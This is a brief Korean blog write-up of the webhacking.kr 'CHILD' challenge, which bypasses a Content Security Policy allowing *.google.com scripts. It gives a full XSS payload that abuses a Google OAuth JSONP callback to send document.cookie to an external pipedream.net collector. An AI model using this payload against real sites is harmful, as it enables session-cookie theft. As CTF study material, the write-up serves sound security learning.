write-ups/ webhacking.kr

webhacking.kr CHILD write-up

2021. 4. 17. 15:39

 

회사에서 늦게 퇴근하고 찍은 남영역

 

문제 분석

 전형적인 XSS 문제이고, CSP를 우회하는 문제이다. 해당 문제의 HTTP Header를 보면 다음과 같다.

 

 

script-src https://*.google.com/ 으로 되어있다. google의 서비스 중 하나를 찾아서 reflective한 값을 출력해주는 곳을 찾아야 하겠다.

 

Exploit.

?inject=%3Cscript+src=%22https://accounts.google.com/o/oauth2/revoke?callback=(location.href=%27https://enl33h4vtg95t8o.m.pipedream.net/?c=%27%252bdocument.cookie);%22%3E%3C/script%3E

 구글링을 조금 해보니까 callback을 통해 javascript code를 삽입할 수 있는 구글 서비스들이 있었다. 그중에 accounts.google.com이 사용할 수 있는 특수문자가 많아서 위 익스플로잇 코드를 사용했다.

 

Reference

[*] Content Security Bypass Techniques : Content Security Bypass Techniques to perform XSS | Medium 

[*] JSONBee : zigoo0/JSONBee: A ready to use JSONP endpoints/payloads to help bypass content security policy (CSP) of different websites. (github.com) 

 

 

'write-ups/ > webhacking.kr' 카테고리의 다른 글

webhacking.kr slipping beauty write-up  (0) 2021.04.21
webhacking.kr NotSQL  (0) 2021.04.20
webhacking.kr CHILD write-up  (0) 2021.04.17